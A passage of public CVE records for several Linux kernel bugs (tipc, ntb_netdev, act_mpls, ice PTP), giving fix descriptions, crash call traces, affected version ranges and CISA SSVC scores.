"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:06.982Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/tipc/bearer.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "2de76d37d4a6dca9b96ea51da24d4290e6cfa1a5",
"status": "affected",
"version": "35c55c9877f8de0ab129fa1a309271d0ecc868b9",
"versionType": "git"
},
{
"lessThan": "f96dc3adb9a97b8f3dfdb88796483491a3006b71",
"status": "affected",
"version": "35c55c9877f8de0ab129fa1a309271d0ecc868b9",
"versionType": "git"
},
{
"lessThan": "f4f59fdbc748805b08c13dae14c01f0518c77c94",
"status": "affected",
"version": "35c55c9877f8de0ab129fa1a309271d0ecc868b9",
"versionType": "git"
},
{
"lessThan": "be4977b847f5d5cedb64d50eaaf2218c3a55a3a3",
"status": "affected",
"version": "35c55c9877f8de0ab129fa1a309271d0ecc868b9",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/tipc/bearer.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.8"
},
{
"lessThan": "4.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.106",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.29",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.106",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.29",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.15",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "4.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntipc: fix kernel panic when enabling bearer\n\nWhen enabling a bearer on a node, a kernel panic is observed:\n\n[ 4.498085] RIP: 0010:tipc_mon_prep+0x4e/0x130 [tipc]\n...\n[ 4.520030] Call Trace:\n[ 4.520689] \u003cIRQ\u003e\n[ 4.521236] tipc_link_build_proto_msg+0x375/0x750 [tipc]\n[ 4.522654] tipc_link_build_state_msg+0x48/0xc0 [tipc]\n[ 4.524034] __tipc_node_link_up+0xd7/0x290 [tipc]\n[ 4.525292] tipc_rcv+0x5da/0x730 [tipc]\n[ 4.526346] ? __netif_receive_skb_core+0xb7/0xfc0\n[ 4.527601] tipc_l2_rcv_msg+0x5e/0x90 [tipc]\n[ 4.528737] __netif_receive_skb_list_core+0x20b/0x260\n[ 4.530068] netif_receive_skb_list_internal+0x1bf/0x2e0\n[ 4.531450] ? dev_gro_receive+0x4c2/0x680\n[ 4.532512] napi_complete_done+0x6f/0x180\n[ 4.533570] virtnet_poll+0x29c/0x42e [virtio_net]\n...\n\nThe node in question is receiving activate messages in another\nthread after changing bearer status to allow message sending/\nreceiving in current thread:\n\n thread 1 | thread 2\n -------- | --------\n |\ntipc_enable_bearer() |\n test_and_set_bit_lock() |\n tipc_bearer_xmit_skb() |\n | tipc_l2_rcv_msg()\n | tipc_rcv()\n | __tipc_node_link_up()\n | tipc_link_build_state_msg()\n | tipc_link_build_proto_msg()\n | tipc_mon_prep()\n | {\n | ...\n | // null-pointer dereference\n | u16 gen = mon-\u003edom_gen;\n | ...\n | }\n // Not being executed yet |\n tipc_mon_create() |\n { |\n ... |\n // allocate |\n mon = kzalloc(); |\n ... |\n } |\n\nMonitoring pointer in thread 2 is dereferenced before monitoring data\nis allocated in thread 1. This causes kernel panic.\n\nThis commit fixes it by allocating the monitoring data before enabling\nthe bearer to receive messages."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:05.214Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/2de76d37d4a6dca9b96ea51da24d4290e6cfa1a5"
},
{
"url": "https://git.kernel.org/stable/c/f96dc3adb9a97b8f3dfdb88796483491a3006b71"
},
{
"url": "https://git.kernel.org/stable/c/f4f59fdbc748805b08c13dae14c01f0518c77c94"
},
{
"url": "https://git.kernel.org/stable/c/be4977b847f5d5cedb64d50eaaf2218c3a55a3a3"
}
],
"title": "tipc: fix kernel panic when enabling bearer",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48865",
"datePublished": "2024-07-16T12:25:27.843Z",
"dateReserved": "2024-07-16T11:38:08.920Z",
"dateUpdated": "2025-05-04T08:25:05.214Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42110 (GCVE-0-2024-42110)
Vulnerability from cvelistv5
Published
2024-07-30 07:46
Modified
2025-05-04 09:23
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: ntb_netdev: Move ntb_netdev_rx_handler() to call netif_rx() from __netif_rx()
The following is emitted when using idxd (DSA) dmanegine as the data
mover for ntb_transport that ntb_netdev uses.
[74412.546922] BUG: using smp_processor_id() in preemptible [00000000] code: irq/52-idxd-por/14526
[74412.556784] caller is netif_rx_internal+0x42/0x130
[74412.562282] CPU: 6 PID: 14526 Comm: irq/52-idxd-por Not tainted 6.9.5 #5
[74412.569870] Hardware name: Intel Corporation ArcherCity/ArcherCity, BIOS EGSDCRB1.E9I.1752.P05.2402080856 02/08/2024
[74412.581699] Call Trace:
[74412.584514] <TASK>
[74412.586933] dump_stack_lvl+0x55/0x70
[74412.591129] check_preemption_disabled+0xc8/0xf0
[74412.596374] netif_rx_internal+0x42/0x130
[74412.600957] __netif_rx+0x20/0xd0
[74412.604743] ntb_netdev_rx_handler+0x66/0x150 [ntb_netdev]
[74412.610985] ntb_complete_rxc+0xed/0x140 [ntb_transport]
[74412.617010] ntb_rx_copy_callback+0x53/0x80 [ntb_transport]
[74412.623332] idxd_dma_complete_txd+0xe3/0x160 [idxd]
[74412.628963] idxd_wq_thread+0x1a6/0x2b0 [idxd]
[74412.634046] irq_thread_fn+0x21/0x60
[74412.638134] ? irq_thread+0xa8/0x290
[74412.642218] irq_thread+0x1a0/0x290
[74412.646212] ? __pfx_irq_thread_fn+0x10/0x10
[74412.651071] ? __pfx_irq_thread_dtor+0x10/0x10
[74412.656117] ? __pfx_irq_thread+0x10/0x10
[74412.660686] kthread+0x100/0x130
[74412.664384] ? __pfx_kthread+0x10/0x10
[74412.668639] ret_from_fork+0x31/0x50
[74412.672716] ? __pfx_kthread+0x10/0x10
[74412.676978] ret_from_fork_asm+0x1a/0x30
[74412.681457] </TASK>
The cause is due to the idxd driver interrupt completion handler uses
threaded interrupt and the threaded handler is not hard or soft interrupt
context. However __netif_rx() can only be called from interrupt context.
Change the call to netif_rx() in order to allow completion via normal
context for dmaengine drivers that utilize threaded irq handling.
While the following commit changed from netif_rx() to __netif_rx(),
baebdf48c360 ("net: dev: Makes sure netif_rx() can be invoked in any context."),
the change should've been a noop instead. However, the code precedes this
fix should've been using netif_rx_ni() or netif_rx_any_context().
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.106Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4b3b6c7efee69f077b86ef7f088fb96768e46e1f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e3af5b14e7632bf12058533d69055393e2d126c9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/858ae09f03677a4ab907a15516893bc2cc79d4c3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e15a5d821e5192a3769d846079bc9aa380139baf"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42110",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:17:32.906742Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:06.779Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ntb_netdev.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4b3b6c7efee69f077b86ef7f088fb96768e46e1f",
"status": "affected",
"version": "548c237c0a9972df5d1afaca38aa733ee577128d",
"versionType": "git"
},
{
"lessThan": "e3af5b14e7632bf12058533d69055393e2d126c9",
"status": "affected",
"version": "548c237c0a9972df5d1afaca38aa733ee577128d",
"versionType": "git"
},
{
"lessThan": "858ae09f03677a4ab907a15516893bc2cc79d4c3",
"status": "affected",
"version": "548c237c0a9972df5d1afaca38aa733ee577128d",
"versionType": "git"
},
{
"lessThan": "e15a5d821e5192a3769d846079bc9aa380139baf",
"status": "affected",
"version": "548c237c0a9972df5d1afaca38aa733ee577128d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ntb_netdev.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.9"
},
{
"lessThan": "3.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.98",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.39",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.98",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.39",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "3.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ntb_netdev: Move ntb_netdev_rx_handler() to call netif_rx() from __netif_rx()\n\nThe following is emitted when using idxd (DSA) dmanegine as the data\nmover for ntb_transport that ntb_netdev uses.\n\n[74412.546922] BUG: using smp_processor_id() in preemptible [00000000] code: irq/52-idxd-por/14526\n[74412.556784] caller is netif_rx_internal+0x42/0x130\n[74412.562282] CPU: 6 PID: 14526 Comm: irq/52-idxd-por Not tainted 6.9.5 #5\n[74412.569870] Hardware name: Intel Corporation ArcherCity/ArcherCity, BIOS EGSDCRB1.E9I.1752.P05.2402080856 02/08/2024\n[74412.581699] Call Trace:\n[74412.584514] \u003cTASK\u003e\n[74412.586933] dump_stack_lvl+0x55/0x70\n[74412.591129] check_preemption_disabled+0xc8/0xf0\n[74412.596374] netif_rx_internal+0x42/0x130\n[74412.600957] __netif_rx+0x20/0xd0\n[74412.604743] ntb_netdev_rx_handler+0x66/0x150 [ntb_netdev]\n[74412.610985] ntb_complete_rxc+0xed/0x140 [ntb_transport]\n[74412.617010] ntb_rx_copy_callback+0x53/0x80 [ntb_transport]\n[74412.623332] idxd_dma_complete_txd+0xe3/0x160 [idxd]\n[74412.628963] idxd_wq_thread+0x1a6/0x2b0 [idxd]\n[74412.634046] irq_thread_fn+0x21/0x60\n[74412.638134] ? irq_thread+0xa8/0x290\n[74412.642218] irq_thread+0x1a0/0x290\n[74412.646212] ? __pfx_irq_thread_fn+0x10/0x10\n[74412.651071] ? __pfx_irq_thread_dtor+0x10/0x10\n[74412.656117] ? __pfx_irq_thread+0x10/0x10\n[74412.660686] kthread+0x100/0x130\n[74412.664384] ? __pfx_kthread+0x10/0x10\n[74412.668639] ret_from_fork+0x31/0x50\n[74412.672716] ? __pfx_kthread+0x10/0x10\n[74412.676978] ret_from_fork_asm+0x1a/0x30\n[74412.681457] \u003c/TASK\u003e\n\nThe cause is due to the idxd driver interrupt completion handler uses\nthreaded interrupt and the threaded handler is not hard or soft interrupt\ncontext. However __netif_rx() can only be called from interrupt context.\nChange the call to netif_rx() in order to allow completion via normal\ncontext for dmaengine drivers that utilize threaded irq handling.\n\nWhile the following commit changed from netif_rx() to __netif_rx(),\nbaebdf48c360 (\"net: dev: Makes sure netif_rx() can be invoked in any context.\"),\nthe change should\u0027ve been a noop instead. However, the code precedes this\nfix should\u0027ve been using netif_rx_ni() or netif_rx_any_context()."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:23:13.403Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/4b3b6c7efee69f077b86ef7f088fb96768e46e1f"
},
{
"url": "https://git.kernel.org/stable/c/e3af5b14e7632bf12058533d69055393e2d126c9"
},
{
"url": "https://git.kernel.org/stable/c/858ae09f03677a4ab907a15516893bc2cc79d4c3"
},
{
"url": "https://git.kernel.org/stable/c/e15a5d821e5192a3769d846079bc9aa380139baf"
}
],
"title": "net: ntb_netdev: Move ntb_netdev_rx_handler() to call netif_rx() from __netif_rx()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42110",
"datePublished": "2024-07-30T07:46:04.892Z",
"dateReserved": "2024-07-29T15:50:41.176Z",
"dateUpdated": "2025-05-04T09:23:13.403Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52906 (GCVE-0-2023-52906)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 07:45
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/sched: act_mpls: Fix warning during failed attribute validation
The 'TCA_MPLS_LABEL' attribute is of 'NLA_U32' type, but has a
validation type of 'NLA_VALIDATE_FUNCTION'. This is an invalid
combination according to the comment above 'struct nla_policy':
"
Meaning of `validate' field, use via NLA_POLICY_VALIDATE_FN:
NLA_BINARY Validation function called for the attribute.
All other Unused - but note that it's a union
"
This can trigger the warning [1] in nla_get_range_unsigned() when
validation of the attribute fails. Despite being of 'NLA_U32' type, the
associated 'min'/'max' fields in the policy are negative as they are
aliased by the 'validate' field.
Fix by changing the attribute type to 'NLA_BINARY' which is consistent
with the above comment and all other users of NLA_POLICY_VALIDATE_FN().
As a result, move the length validation to the validation function.
No regressions in MPLS tests:
# ./tdc.py -f tc-tests/actions/mpls.json
[...]
# echo $?
0
[1]
WARNING: CPU: 0 PID: 17743 at lib/nlattr.c:118
nla_get_range_unsigned+0x1d8/0x1e0 lib/nlattr.c:117
Modules linked in:
CPU: 0 PID: 17743 Comm: syz-executor.0 Not tainted 6.1.0-rc8 #3
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
rel-1.13.0-48-gd9c812dda519-prebuilt.qemu.org 04/01/2014
RIP: 0010:nla_get_range_unsigned+0x1d8/0x1e0 lib/nlattr.c:117
[...]
Call Trace:
<TASK>
__netlink_policy_dump_write_attr+0x23d/0x990 net/netlink/policy.c:310
netlink_policy_dump_write_attr+0x22/0x30 net/netlink/policy.c:411
netlink_ack_tlv_fill net/netlink/af_netlink.c:2454 [inline]
netlink_ack+0x546/0x760 net/netlink/af_netlink.c:2506
netlink_rcv_skb+0x1b7/0x240 net/netlink/af_netlink.c:2546
rtnetlink_rcv+0x18/0x20 net/core/rtnetlink.c:6109
netlink_unicast_kernel net/netlink/af_netlink.c:1319 [inline]
netlink_unicast+0x5e9/0x6b0 net/netlink/af_netlink.c:1345
netlink_sendmsg+0x739/0x860 net/netlink/af_netlink.c:1921
sock_sendmsg_nosec net/socket.c:714 [inline]
sock_sendmsg net/socket.c:734 [inline]
____sys_sendmsg+0x38f/0x500 net/socket.c:2482
___sys_sendmsg net/socket.c:2536 [inline]
__sys_sendmsg+0x197/0x230 net/socket.c:2565
__do_sys_sendmsg net/socket.c:2574 [inline]
__se_sys_sendmsg net/socket.c:2572 [inline]
__x64_sys_sendmsg+0x42/0x50 net/socket.c:2572
do_syscall_x64 arch/x86/entry/common.c:50 [inline]
do_syscall_64+0x2b/0x70 arch/x86/entry/common.c:80
entry_SYSCALL_64_after_hwframe+0x63/0xcd
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52906",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:03:11.641593Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:13.683Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/sched/act_mpls.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "2b157c3c5d6b8ddca48d53c9e662032f65af8d61",
"status": "affected",
"version": "2a2ea50870baa3fb4de0872c5b60828138654ca7",
"versionType": "git"
},
{
"lessThan": "453277feb41c2235cf2c0de9209eef962c401457",
"status": "affected",
"version": "2a2ea50870baa3fb4de0872c5b60828138654ca7",
"versionType": "git"
},
{
"lessThan": "9e2c38827cdc6fdd3bb375c8607fc04d289756f9",
"status": "affected",
"version": "2a2ea50870baa3fb4de0872c5b60828138654ca7",
"versionType": "git"
},
{
"lessThan": "8a97b544b98e44f596219ebb290fd2ba2fd5d644",
"status": "affected",
"version": "2a2ea50870baa3fb4de0872c5b60828138654ca7",
"versionType": "git"
},
{
"lessThan": "9e17f99220d111ea031b44153fdfe364b0024ff2",
"status": "affected",
"version": "2a2ea50870baa3fb4de0872c5b60828138654ca7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/sched/act_mpls.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.3"
},
{
"lessThan": "5.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.229",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.164",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.89",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.229",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.164",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.89",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.7",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "5.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: act_mpls: Fix warning during failed attribute validation\n\nThe \u0027TCA_MPLS_LABEL\u0027 attribute is of \u0027NLA_U32\u0027 type, but has a\nvalidation type of \u0027NLA_VALIDATE_FUNCTION\u0027. This is an invalid\ncombination according to the comment above \u0027struct nla_policy\u0027:\n\n\"\nMeaning of `validate\u0027 field, use via NLA_POLICY_VALIDATE_FN:\n NLA_BINARY Validation function called for the attribute.\n All other Unused - but note that it\u0027s a union\n\"\n\nThis can trigger the warning [1] in nla_get_range_unsigned() when\nvalidation of the attribute fails. Despite being of \u0027NLA_U32\u0027 type, the\nassociated \u0027min\u0027/\u0027max\u0027 fields in the policy are negative as they are\naliased by the \u0027validate\u0027 field.\n\nFix by changing the attribute type to \u0027NLA_BINARY\u0027 which is consistent\nwith the above comment and all other users of NLA_POLICY_VALIDATE_FN().\nAs a result, move the length validation to the validation function.\n\nNo regressions in MPLS tests:\n\n # ./tdc.py -f tc-tests/actions/mpls.json\n [...]\n # echo $?\n 0\n\n[1]\nWARNING: CPU: 0 PID: 17743 at lib/nlattr.c:118\nnla_get_range_unsigned+0x1d8/0x1e0 lib/nlattr.c:117\nModules linked in:\nCPU: 0 PID: 17743 Comm: syz-executor.0 Not tainted 6.1.0-rc8 #3\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\nrel-1.13.0-48-gd9c812dda519-prebuilt.qemu.org 04/01/2014\nRIP: 0010:nla_get_range_unsigned+0x1d8/0x1e0 lib/nlattr.c:117\n[...]\nCall Trace:\n \u003cTASK\u003e\n __netlink_policy_dump_write_attr+0x23d/0x990 net/netlink/policy.c:310\n netlink_policy_dump_write_attr+0x22/0x30 net/netlink/policy.c:411\n netlink_ack_tlv_fill net/netlink/af_netlink.c:2454 [inline]\n netlink_ack+0x546/0x760 net/netlink/af_netlink.c:2506\n netlink_rcv_skb+0x1b7/0x240 net/netlink/af_netlink.c:2546\n rtnetlink_rcv+0x18/0x20 net/core/rtnetlink.c:6109\n netlink_unicast_kernel net/netlink/af_netlink.c:1319 [inline]\n netlink_unicast+0x5e9/0x6b0 net/netlink/af_netlink.c:1345\n netlink_sendmsg+0x739/0x860 net/netlink/af_netlink.c:1921\n sock_sendmsg_nosec net/socket.c:714 [inline]\n sock_sendmsg net/socket.c:734 [inline]\n ____sys_sendmsg+0x38f/0x500 net/socket.c:2482\n ___sys_sendmsg net/socket.c:2536 [inline]\n __sys_sendmsg+0x197/0x230 net/socket.c:2565\n __do_sys_sendmsg net/socket.c:2574 [inline]\n __se_sys_sendmsg net/socket.c:2572 [inline]\n __x64_sys_sendmsg+0x42/0x50 net/socket.c:2572\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x2b/0x70 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:45:46.010Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/2b157c3c5d6b8ddca48d53c9e662032f65af8d61"
},
{
"url": "https://git.kernel.org/stable/c/453277feb41c2235cf2c0de9209eef962c401457"
},
{
"url": "https://git.kernel.org/stable/c/9e2c38827cdc6fdd3bb375c8607fc04d289756f9"
},
{
"url": "https://git.kernel.org/stable/c/8a97b544b98e44f596219ebb290fd2ba2fd5d644"
},
{
"url": "https://git.kernel.org/stable/c/9e17f99220d111ea031b44153fdfe364b0024ff2"
}
],
"title": "net/sched: act_mpls: Fix warning during failed attribute validation",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52906",
"datePublished": "2024-08-21T06:10:47.121Z",
"dateReserved": "2024-08-21T06:07:11.015Z",
"dateUpdated": "2025-05-04T07:45:46.010Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42139 (GCVE-0-2024-42139)
Vulnerability from cvelistv5
Published
2024-07-30 07:46
Modified
2025-05-04 09:23
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ice: Fix improper extts handling
Extts events are disabled and enabled by the application ts2phc.
However, in case where the driver is removed when the application is
running, a specific extts event remains enabled and can cause a kernel
crash.
As a side effect, when the driver is reloaded and application is started
again, remaining extts event for the channel from a previous run will
keep firing and the message "extts on unexpected channel" might be
printed to the user.
To avoid that, extts events shall be disabled when PTP is released.
References
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.564Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9f69b31ae9e25dec27ad31fbc64dd99af16ee3d3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/00d3b4f54582d4e4a02cda5886bb336eeab268cc"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42139",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:15:59.830923Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:35.575Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/ice/ice_ptp.c",
"drivers/net/ethernet/intel/ice/ice_ptp.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9f69b31ae9e25dec27ad31fbc64dd99af16ee3d3",
"status": "affected",
"version": "172db5f91d5f7b91670c68a7547798b0b5374158",
"versionType": "git"
},
{
"lessThan": "00d3b4f54582d4e4a02cda5886bb336eeab268cc",
"status": "affected",
"version": "172db5f91d5f7b91670c68a7547798b0b5374158",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/ice/ice_ptp.c",
"drivers/net/ethernet/intel/ice/ice_ptp.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.14"
},
{
"lessThan": "5.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
